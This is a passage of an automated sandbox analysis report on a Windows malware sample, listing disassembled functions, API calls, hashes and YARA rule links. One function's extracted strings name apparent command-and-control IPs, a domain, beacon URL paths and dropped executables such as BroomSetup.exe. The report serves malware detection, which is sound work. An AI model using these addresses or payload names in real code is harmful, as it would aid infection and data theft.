                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b880830fb10006c245270c451b658a342de933d97101c235293ed34406791828
                                                                                                                                                                                                                                                                                        • Instruction ID: 5794e906f2440793f0f111a630642e31dc7bb6ced8b38f44c89e924cf631a0c7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b880830fb10006c245270c451b658a342de933d97101c235293ed34406791828
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87318770A00615AFCB15DF09CA84A9ABBB1FF48314F14856EE405AB791C7B9ED40CB94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00402403 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                                                                          • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d6c6d0674046824ae49e356bd95e2b3b32d4d687766b11b914c442daf499c3b2
                                                                                                                                                                                                                                                                                        • Instruction ID: 4e0495d31301cfc09fe992fc8428b3d42591f74c8e771436201b91ad316d0700
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6c6d0674046824ae49e356bd95e2b3b32d4d687766b11b914c442daf499c3b2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D217C70601611DFC728DF19C54896ABBF5FF88314B20C26DE85A9B7A1C774AE41CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00403A42 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 94d41c902baa54b1b7ab3027f5a178ce52665b7b455d6233b737f42a58ba5fa1
                                                                                                                                                                                                                                                                                        • Instruction ID: ebd396bbc56fc5044348258bf57d62a6d48641e9a3723b70d5712ae04e929cd2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 94d41c902baa54b1b7ab3027f5a178ce52665b7b455d6233b737f42a58ba5fa1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9511D031A042048ECB04DFA9C895BEEBFB4BF44314F08812ED8417B2C2D7789A45CB64
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041AFF9 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
                                                                                                                                                                                                                                                                                        • Instruction ID: 62b4485d732ad4ebc0017ff3881fb56af0f069673ee8f9cf524c42d6b5156d4d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6911367590410AAFCB05DF98E9419EB7BF4EF48314F0040AAF819AB311D631E9618BA9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040E1B2 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 83cec55c4b5daa9d74b2b4d2a978cdeff380abe4f85b56f60a07e90a3d372b1e
                                                                                                                                                                                                                                                                                        • Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83cec55c4b5daa9d74b2b4d2a978cdeff380abe4f85b56f60a07e90a3d372b1e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00402F6B Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                                                                          • Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                                                                          • Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                                                                          • Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                                                                          • Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                                                                          • Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3585332825-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9e5b33f735e5741d3742e5114604eb84fbebb543a0d7af76fa80b020808a8594
                                                                                                                                                                                                                                                                                        • Instruction ID: 4123f54f6db546b52d5441bf0cc69889d4086bdab9222fcc4d2dc13d92cadc12
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e5b33f735e5741d3742e5114604eb84fbebb543a0d7af76fa80b020808a8594
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32018F70610114AFDB14DB65CA0ABAEB3F9AF44708F00403EF405B76D1DBF8AE408B58
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041A2FA Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 93a3af6b4d2091d414adecc1df8379ca51dbaf06e002591ee7f00cc1388aa319
                                                                                                                                                                                                                                                                                        • Instruction ID: b492b302e4735b3d70b5ef79ffcf6f17a9fdb10017537b69176e17197afc0c8a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 93a3af6b4d2091d414adecc1df8379ca51dbaf06e002591ee7f00cc1388aa319
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DF09A3251111CBBCF015E96DC01DDA3B6EEF89324F100256FD2492050DA3ACA61ABA5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00417A45 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                                                                        • Instruction ID: dd4a480e522f73ad3d9a6edd52b828d095e0909c103fd04d4038ae70eb088b48
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35E0A03128822557972026629C00BDF6A69AF417E0B150223BC0496290CA5C8BD182AD
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00409256 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00409967
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2005118841-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
                                                                                                                                                                                                                                                                                        • Instruction ID: da63f0164d942bc1a0aafd7abbbc04ca9aad8e839738e50b0fb3006ae61beab9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9E0923440430EB6CF047A66D9169AA372C1E00324F20897FB818B55E2EB78DDA6C59E
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0041A039 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
                                                                                                                                                                                                                                                                                        • Instruction ID: d84f72958a1ce38eec5c6f13dd7d1e1a4f86a781eb43601fc0a5ec169b289762
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2D06C3210010DBBDF129F84DC06EDA7BAAFB48754F018010BA5856060C732E872AB94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 042EDF5D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 042EDFAE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2435074573.00000000042ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 042ED000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_42ed000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                        • Instruction ID: f751d1c35a8858e7e2216be11113b0584304f3de6e9f5e4c53beee45f889d81d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83113979A10208EFDB01DF99C985E98BFF5AF08351F0580A4F9489B362D771EA90DF80
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                        Function 04224DA5 Relevance: 48.4, APIs: 1, Strings: 26, Instructions: 1192COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 042265BB: __EH_prolog.LIBCMT ref: 042265C0
                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043CEE4), ref: 04224E6C
                                                                                                                                                                                                                                                                                          • Part of subcall function 04226149: __EH_prolog.LIBCMT ref: 0422614E
                                                                                                                                                                                                                                                                                          • Part of subcall function 04226149: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 04226230
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                                                                                                                                                        • String ID: @$/1/Qg_Appv5.exe$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$Qg_Appv5.exe$SOFTWARE\BroomCleaner$eight$five$nine$note.padd.cn.com$one$seven$ten$two
                                                                                                                                                                                                                                                                                        • API String ID: 2531350358-486824737
                                                                                                                                                                                                                                                                                        • Opcode ID: 33da481005bee5aae73a4727e24a90ce0064b3984eafc34884cbf9b1cd4f467e
                                                                                                                                                                                                                                                                                        • Instruction ID: 094fc236602900118e9e83e832c7a050ce9e42ba4538cfc3840922c0222c3c00
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33da481005bee5aae73a4727e24a90ce0064b3984eafc34884cbf9b1cd4f467e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3A2211162B2D0BEE711F778589659E3FE11B63344F94E4A9D4A0BB3A3C954A10CC3AF
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0042099B Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00420AA7
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00420B02
                                                                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00420B11
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,=CA,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420B59
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 00420B78
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                                                                        • String ID: 0B$=CA$=CA$=CA
                                                                                                                                                                                                                                                                                        • API String ID: 745075371-1249640317
                                                                                                                                                                                                                                                                                        • Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                                                                        • Instruction ID: 4fe3cdac360959e8bc756ce2b097bcf421192d2936f9b63a8d14e5918577f4e5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E519471B003259BDB20DFA5EC45BBF73F8AF24700FC4446AA904E7292D77899408B59
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00420063 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 236COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00414344,?,?,?,?,00413D9B,?,00000004), ref: 00420145
                                                                                                                                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 004201D5
                                                                                                                                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 004201E3
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,DCA,00000000,?), ref: 00420286
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                                                                                        • String ID: 0B$DCA
                                                                                                                                                                                                                                                                                        • API String ID: 4212172061-1121888207
                                                                                                                                                                                                                                                                                        • Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                                                                        • Instruction ID: e41c47d1cae27ef38c8e1a894900132afe6bf825e943f98d621edfc326b9cdfb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34610775700225AAD724AB65EC46BBB77E8EF04314F54006FF905DB283EB78ED418768
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004207C7 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420860
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420889
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,00420AE6,?,00000000), ref: 0042089E
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                                                        • String ID: ACP$OCP$B
                                                                                                                                                                                                                                                                                        • API String ID: 2299586839-1332025818
                                                                                                                                                                                                                                                                                        • Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                                                                        • Instruction ID: b7a8718eca8bd207e438c17e895b22dc0f84da9ff629001d2d850ed802a8b5f8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5321F422B00124AADB34AF14E900BA773E6EF90B10BD68476E809D7312E736DD41C3D9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

